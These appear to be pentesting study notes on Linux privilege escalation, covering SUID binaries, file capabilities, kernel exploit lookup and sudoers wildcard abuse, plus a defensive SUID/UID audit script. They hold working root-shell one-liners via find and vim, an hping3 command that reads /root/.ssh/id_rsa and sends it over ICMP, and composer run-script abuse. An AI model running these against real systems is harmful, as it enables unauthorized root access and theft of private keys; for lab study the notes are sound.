
Insecure System Components

18.7.1 - Abusing Setuid Binaries and Capabilities

If a program is running, we can see it and find its PID with ps

ps u -C passwd

We can inspect the real and effective UID assigned to the process by reading its entry in the /proc pseudo-filesystem (1932 is the PID found above)

grep Uid /proc/1932/status

The same check works for any other process, for example the bash process of a user we're interested in

grep Uid /proc/1131/status

We can check whether a binary has the SUID bit set; passwd generally has it

ls -asl /usr/bin/passwd

Spawn a bash shell via find, which was found to have the SUID bit set as a misconfiguration (the -p flag tells bash not to drop the elevated effective UID)

find /home/joe/Desktop -exec "/usr/bin/bash" -p \;

Manually enumerate file capabilities by recursively searching from the root directory

/usr/sbin/getcap -r / 2>/dev/null

After finding potentially vulnerable binaries with the SUID bit set, check GTFOBins for exploitation - https://gtfobins.github.io/
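The checks above (SUID/SGID bits, file capabilities, real vs. effective UID in /proc/<pid>/status) as a small audit script. This is an added example, not part of the original notes; it runs against a constructed sample tree and two constructed status files, and on a live host you would point it at / and /proc/<pid>/status instead.

```shell
#!/bin/sh
# Added audit helpers (not from the original notes) for the SUID / capability / UID checks above.

# Recursively list files with the setuid or setgid bit under DIR (the recursive form of ls -asl).
list_setuid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# List file capabilities under DIR when getcap is installed (same as the getcap -r check).
list_capabilities() {
    command -v getcap >/dev/null 2>&1 || { echo "getcap not installed" >&2; return 1; }
    getcap -r "$1" 2>/dev/null
}

# Read the Uid: line of a /proc/<pid>/status file. The four fields are
# real, effective, saved and filesystem UID. Print and return 0 when the
# effective UID differs from the real one (a setuid binary such as passwd
# doing privileged work), return 1 when they match (an ordinary process).
proc_uid_mismatch() {
    awk 'BEGIN { rc = 1 }
         /^Uid:/ { if ($2 != $3) { print "real=" $2 " effective=" $3; rc = 0 } }
         END { exit rc }' "$1"
}

# Build a constructed sample tree in DIR: one plain file, one setuid file and
# two constructed status files (passwd run by uid 1000, and that user's bash shell).
build_sample() {
    mkdir -p "$1/bin"
    printf '#!/bin/sh\n' > "$1/bin/plain"
    printf '#!/bin/sh\n' > "$1/bin/setme"
    chmod 755 "$1/bin/plain"
    chmod 4755 "$1/bin/setme"
    printf 'Name:\tpasswd\nUid:\t1000\t0\t0\t0\nGid:\t1000\t1000\t1000\t1000\n' > "$1/status.passwd"
    printf 'Name:\tbash\nUid:\t1000\t1000\t1000\t1000\nGid:\t1000\t1000\t1000\t1000\n' > "$1/status.bash"
}

# Stand-alone run against the constructed sample.
sample=$(mktemp -d)
build_sample "$sample"
echo "setuid files:"; list_setuid_files "$sample"
echo "passwd process:"; proc_uid_mismatch "$sample/status.passwd"
echo "bash process:";   proc_uid_mismatch "$sample/status.bash" || echo "real and effective UID match"
rm -rf "$sample"
```

Saving the output of list_setuid_files and list_capabilities from a known-good build gives a baseline to diff against later, which is how an unexpected SUID bit on something like find shows up.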

Annoying SUID Binaries

There is an annoying vim SUID binary that is finicky but does work, so don't give up on it if you see vim has the SUID bit set. What a surprise, right? Vim being awkward and difficult? Noooooo, not vim, vim is perfect, anything else is for casuals.
https://gtfobins.github.io/gtfobins/vim/

/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "/bin/bash")'

Another one is sudoers access to the hping3 binary. It also requires a specific command/wildcard entry in sudoers as well as a way to spawn two fully interactive terminals (one to listen, one to send).
https://medium.com/@haadimdwork/icmp-walkthrough-proving-grounds-92b43fa18823

sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa
sudo hping3 --icmp 127.0.0.1 --listen signature --safe

18.7.2 - Exploiting kernel vulnerabilities

Kernels are the core of any OS. Think of them as a layer between application software and the actual computer hardware. The kernel has complete control over the OS, so exploiting a kernel vulnerability can result in code execution as root.

Gather information about the target distribution and release

cat /etc/issue

Inspect the kernel version and system architecture

uname -a
uname -r
arch

We can use SearchSploit, among other tools, to look for exploits matching our kernel version as well as our distribution name and version

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8"

Another, arguably better tool is linux-exploit-suggester-2.
Provide it with the kernel version (-k) when running.

./linux-exploit-suggester-2.pl -k 2.6.32

18.7.3 - Sudoers wildcard argument exploitation

An incorrectly placed wildcard can allow extra arguments to be appended to an existing sudoers command, resulting in potential privesc.

In this example, the composer configuration file in the working directory defines a script that the composer binary can invoke with run-script. Write access to that file allows us to add our own arbitrary script: a revshell, a root bash, a sudoers edit, etc.

User skunk may run the following commands on debian: (ALL : ALL) ALL (root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
sudo /usr/bin/composer --working-dir=/var/www/html/lavita run-script x